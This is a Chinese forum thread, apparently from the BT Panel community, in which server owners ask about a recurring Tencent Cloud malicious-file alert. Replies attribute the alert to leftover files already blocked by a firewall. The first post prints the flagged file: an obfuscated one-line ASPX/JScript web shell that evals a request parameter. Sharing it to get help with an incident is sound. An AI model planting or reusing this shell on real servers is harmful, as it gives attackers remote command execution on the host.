【已解答】腾讯云【主机安全】恶意文件通知
腾讯云云服务器系统:Ubuntu 22.04 (Jammy Jellyfish) x86_64(Py3.7.8)
宝塔版本:免费版 9.0.0 安装了第三方免费防火墙
问题描述:
该文件内容如下:
<% function EY0b942T(){var GEPH="u",Ah6c7="afe",C02u=GEPH+"ns"+Ah6c7;return C02u;}var FNfe01:String=Request["a"];var FNfe01 = FNfe01.substring(0, 9999);~~~~eval/*Z#?h*u@!hXS66OqWw8*/(FNfe01,EY0b942T());%><%@Page Language = JS%>
我技术有限,不知道是因为什么原因有这个恶意文件,烦请各位大佬抽空帮忙分析一下,万分感谢!
我好几个主机都出现了 php后边随机字符
文件内容跟你的一样 这个看起来是已经被防火墙拦截的遗留文件
删除即可 阿珂 发表于 2025-5-30 14:21
这个看起来是已经被防火墙拦截的遗留文件
删除即可
好的,谢谢大佬解答疑惑 阿珂 发表于 2025-5-30 14:21
这个看起来是已经被防火墙拦截的遗留文件
删除即可
我们也出现了一样的告警,恶意文件内容也一模一样,但是我们目录下找不到这些文件,请问是一样的情况吗?这些文件是被宝塔删了,还是被恶意转存了?我们是企业版 阿珂 发表于 2025-5-30 14:21
这个看起来是已经被防火墙拦截的遗留文件
删除即可
我们也出现了一样的告警,恶意文件内容也一模一样,但是我们目录下找不到这些文件,请问是一样的情况吗?这些文件是被宝塔删了,还是被恶意转存了?我们是企业版
出海互动 发表于 2025-5-31 19:59
我们也出现了一样的告警,恶意文件内容也一模一样,但是我们目录下找不到这些文件,请问是一样的情况吗? ...
我的是免费版的,删了又会出现,文件名是php+6位随机字符,内容是一样的,反反复复,不知道怎么回事 出海互动 发表于 2025-5-31 19:59
我们也出现了一样的告警,恶意文件内容也一模一样,但是我们目录下找不到这些文件,请问是一样的情况吗? ...
这个是已经被nginx防火墙拦截下来了的,不影响,缓存文件而已
付费版nginx防火墙下个版本会进行优化 宝塔用户_vgdckc 发表于 2025-6-3 13:41
我的是免费版的,删了又会出现,文件名是php+6位随机字符,内容是一样的,反反复复,不知道怎么回事 ...
使用了免费版nginx防火墙,这个是被防火墙拦截下来了的,不影响
不嫌麻烦就手动删除一下
页:
[1]